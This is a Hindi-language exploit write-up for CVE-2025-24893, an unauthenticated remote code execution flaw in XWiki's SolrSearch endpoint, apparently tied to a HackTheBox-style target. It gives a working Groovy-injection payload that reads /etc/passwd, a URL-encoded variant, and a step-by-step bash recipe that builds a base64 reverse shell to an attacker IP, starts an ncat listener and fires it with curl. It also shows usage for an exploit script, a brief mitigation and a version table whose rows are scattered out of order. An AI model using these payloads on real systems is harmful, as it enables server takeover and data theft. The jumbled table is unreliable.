
CVE-2025-24893 एक लोकप्रिय ओपन-सोर्स एंटरप्राइज़ विकी प्लेटफ़ॉर्म XWiki में पाई जाने वाली एक गंभीर, अप्रमाणित रिमोट कोड एग्ज़ीक्यूशन (RCE) कमज़ोरी है।
SolrSearch मैक्रो (XWiki UI)/xwiki/bin/get/Main/SolrSearch एंडपॉइंट अविश्वसनीय text= इनपुट को सीधे Freemarker टेम्पलेट में जोड़ता है।
टेम्पलेट को समय से पहले बंद करके और एक नया {{groovy}} … {{/groovy}} ब्लॉक खोलकर, एक हमलावर बिना प्रमाणीकरण के मनमाना Groovy कोड निष्पादित कर सकता है।
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>> HTTP/1.1
SolrSearch को आपूर्ति किए गए टेक्स्ट को सादे सामग्री के रूप में एम्बेड करना चाहिए, लेकिन मैक्रो हैंडलर }}}} को एस्केप करने में विफल रहता है, जिसके कारण निम्नलिखित होता है:
}}}} वर्तमान Freemarker ब्लॉक को बंद करता है। {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
async=false सिंक्रोनस निष्पादन को बाध्य करता है (अतिथियों के लिए भी काम करता है)।/etc/passwd प्रिंट करने वाला न्यूनतम PoC:
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
URL-एन्कोडेड वेरिएंट (स्पेस → %20, ब्रेसेस → %7B/%7D, आदि):
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
| शाखा | समाधान किया गया | असुरक्षित ≤ |
|---|---|---|
| 15.x | 15.10.11 | 15.10.10 (और सभी 15.9 / 15.8 …) |
| 14.x LTS |
(स्रोत: OffSec सलाह और XWiki SEC-S 2025-02)

RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444
# 1. one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"
# 2. Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)
# 3. wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'
# 4. URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
# start listener
sudo ncat -lvnp 4444
# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
xwiki_solr_rce.py exploit/ में शामिल है (नीचे कोड ब्लॉक देखें)।
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>
जहाँ
<TARGET URL> - http:// या https:// सहित URL
(शेल के बजाय कोई मनमाना कमांड चलाने के लिए -c "id" पास करें)

# /etc/xwiki/xwiki.properties
solr.search.enabled = false
अनुसंधान और PoC: DeX1d
अस्वीकरण: केवल शैक्षिक उपयोग के लिए। इसे उन सिस्टमों के खिलाफ चलाना अवैध है जिनके आप मालिक नहीं हैं।
| 14.10.17 |
| 14.10.16 |
| 13 / 12 | अनुरक्षित नहीं – सभी असुरक्षित रहते हैं |